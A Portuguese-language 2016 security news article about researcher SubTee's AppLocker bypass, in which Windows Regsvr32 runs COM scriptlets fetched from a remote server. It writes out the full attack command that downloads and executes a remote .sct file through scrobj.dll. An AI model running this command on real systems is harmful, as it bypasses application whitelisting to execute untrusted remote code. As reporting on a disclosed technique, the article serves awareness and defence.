Microsoft Windows Applocker Burlado por Ferramenta Nativa de Exploração Utilizando Execução de Código Remota.

Microsoft Windows Applocker Burlado por Ferramenta Nativa de Exploração Utilizando Execução de Código Remota.

24 de abril de 2016 Notícias 0
titulo

titulo

A ferramenta de linha de comando nativa do Windows Regsvr32 pode ser explorada ao burlar o MS Applocker e executar código remoto passando por cima dos mecanismos de proteção.

Um pesquisador de segurança recentemente descobriu uma vulnerabilidade que pode muito bem gerar o caos no mundo Windows. A falha pode ser usada para passar por cima das proteções de filtro como o Microsoft Applocker. O binário digitalmente assinado da Microsoft é uma ferramenta chamada Regsvr32 e é uma ferramenta nativa de linha de comando usada para registrar DLLs (dynamic library link) e tipicamente são geradas quando aplicações ou software são instalados em um sistemas Windows.

Uma vez que as DLLs tenham sido registradas, os dados e o código que está contido nas DLLs pode ser compartilhado por uma, duas ou muitas aplicações ao mesmo tempo; entretanto, uma prova de conceito conduzida por um pesquisador de segurança provou que a chamada para a DLL combinada com Scripplets COM (também chamados de arquivos .SCT, mais detalhes em Inside COM+) não é limitado a acesso local.

De fato, para o pesquisador foi permitido executar código JavaScript ou VBScript que está localizado em qualquer lugar da internet. Enquanto a exploração dessa vulnerabilidade apenas requer privilégios mínimos, ela torna o trabalho do atacante fácil e cômodo. Uma vez dentro da rede, o atacante é capaz de executar código malicioso pertencente à qualquer lugar da internet.

Além do mais, a ferramenta de linha de comando Regsvr32 é uma proxy e possui SSL, logo, é uma ferramenta perfeita e fácil de abusar. O pesquisador de segurança, SubTee, explica: “Eu estive pesquisando mecanismos persistentes, que me conduziu a um lugar sombrio. Eu não desejaria a nenhum mortal COM+. Eu encontrei uma referência que declara o código COM+ no elemento de registro no registro e na saída. Eu loguei como um usuário normal e apenas cliquei no arquivo .sct e escolhi “sair” e funcionou.

Esse é um exemplo da chamada de execução:

regsvr32 /s/n/u/i:http://server/file.sct scrobi.dll

Ainda é incerto se essa “funcionalidade” na ferramenta de linha de comando Regsvr32 é padrão ou falha de desenvolvimento, pois não há muita informação sendo documentada sobre essa ferramenta na página do Microsoft MSDN. Entretanto, o seu uso como veículo de exploit é evidente. Da perspectiva de resposta a incidentes e forense digital, a menos que o analista saiba exatamente o que procurar, a detecção desse vetor de ataque é muito difícil de identificar pois não há virtualmente artefato ou restos para serem encontrados uma vez que o comando é executado. Até a data, a Microsoft ainda não comentou ou confirmou essa vulnerabilidade e é incerto quando a Microsoft irá fornecer uma correção, se o fizer. O pesquisador reportou a falha a Microsoft na Terça, no dia 19 de Abril de 2016. Uma prova de conceito está disponível no GITHUB, reporta o site securityaffairs.co.

fonte:

http://securityaffairs.co/wordpress/46600/breaking-news/applocker-circumvented.html

http://i1.wp.com/securityaffairs.co/wordpress/wp-content/uploads/2016/04/bypassing-

Microsoft-AppLocker.png?resize=1024%2C536

http://thrysoee.dk/InsideCOM+/ch05e.htm

http://subt0x10.blogspot.com.br/2016/04/bypass-application-whitelisting-script.html

https://msdn.microsoft.com/en-us/library/ms859484.aspx

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

 

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.